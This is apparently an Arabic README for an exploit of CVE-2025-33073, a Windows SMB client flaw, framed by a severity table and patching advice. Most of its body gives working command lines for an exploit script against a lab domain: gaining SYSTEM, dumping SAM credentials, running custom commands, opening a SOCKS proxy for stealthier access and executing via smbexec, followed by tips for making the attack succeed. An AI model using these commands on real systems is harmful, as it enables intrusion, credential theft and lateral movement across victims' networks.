
CVE-2025-33073
🔥 تنفيذ عن بُعد عالي الخطورة (مُصدّق عليه) 🔥 التحكم غير السليم في الوصول في عميل SMB لويندوز (CWE-284)
| الجانب | التفاصيل |
|---|
| درجة CVSS v3.1 | 8.8 (عالية) 🔥 |
| الأنظمة المتأثرة | ويندوز 10، 11، سيرفر 2012–2025 (جميع الإصدارات) 💻 |
| تاريخ الكشف | 10 يونيو 2025 📅 (تم التصحيح في ترقيع الثلاثاء لشهر يونيو 2025) |
| الاستغلال | مُستغل بنشاط في البرية 😱 أُضيف إلى قائمة CISA KEV في 21 أكتوبر 2025 |
| ناقل الهجوم | شبكة (مُصدّق عليه) 🌐 |
| التأثير | تنفيذ تعليمات برمجية على مستوى SYSTEM 👑 حركة جانبية عبر ترحيل Kerberos |
| التجاوز | تخفيفات انعكاس NTLM ⚡ |
ثبّت الترقيع الآن! 🔧
→ طبق تحديثات مايكروسوفت (مثل KB5060998)
→ دليل تحديث مايكروسوفت 🔗
فعّل توقيع SMB ✍️
→ فرضه على جميع العملاء والخوادم
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
قيّد NTLM 🚫
→ احظر NTLM حيثما أمكن
→ راقب محاولات الترحيل باستخدام أدوات EDR
إصلاح آلي؟ 🤖
→ استخدم Vicarius vRx أو نصوص برمجية مخصصة للتصحيح الجماعي
الحالة اعتبارًا من 15 نوفمبر 2025:
✅ مُصحّح
❌ لا يزال مُستغلًا في الأنظمة غير المُصحّحة
🔔 الموعد النهائي لـ CISA: 10 نوفمبر 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

أمر مخصص بدلاً من تشغيل secretsdump يمكن تنفيذ أمر مخصص.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS لتنفيذ أوامر بشكل أكثر تمويهاً بعد إنشاء اتصال صالح كـ SYSTEM. يجب أن يكون --target و --target-ip متساويين هنا.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

أيضًا يمكن تشغيل أمر مخصص عبر proxychains بدلاً من تفريغ SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

إذا كنت في نفس مجال البث (broadcast domain) للجهاز وكان عرضة لتسميم LLMNR، فيمكن استغلال جهاز دون الحاجة إلى تسجيل سجل DNS.

لقد لاحظت أحيانًا أن الهجوم لا يعمل لأن اسم المضيف يُستخدم في الهجوم مما يؤدي إلى بحث DNS من Kali. إذا كان Kali لا يستخدم خادم DNS أو حصلت على رسالة '/ FAILED' من impacket-ntlmrelayx، فجرب إضافة المضيف إلى ملف /etc/hosts. من المفترض أن يؤدي ذلك إلى نجاح الهجوم.
إذا كنت تستخدم IP، فيجب أن يعمل الهجوم. أحيانًا يؤدي تشغيله عدة مرات إلى نجاح بدلاً من فشل. ليس من الواضح تمامًا حتى الآن سبب حدوث ذلك. أعتقد أنه يتعلق بالشبكة.
جرب طريقة إكراه أخرى باستخدام -M أو --method.
مصادقة NTLM المحلية تحدث

مصادقة NTLM المحلية لا تحدث مما يؤدي إلى محاولة فاشلة

لا تنتظر — ثبّت الترقيع اليوم! 🛑
أمان شبكتك يعتمد عليه. 💪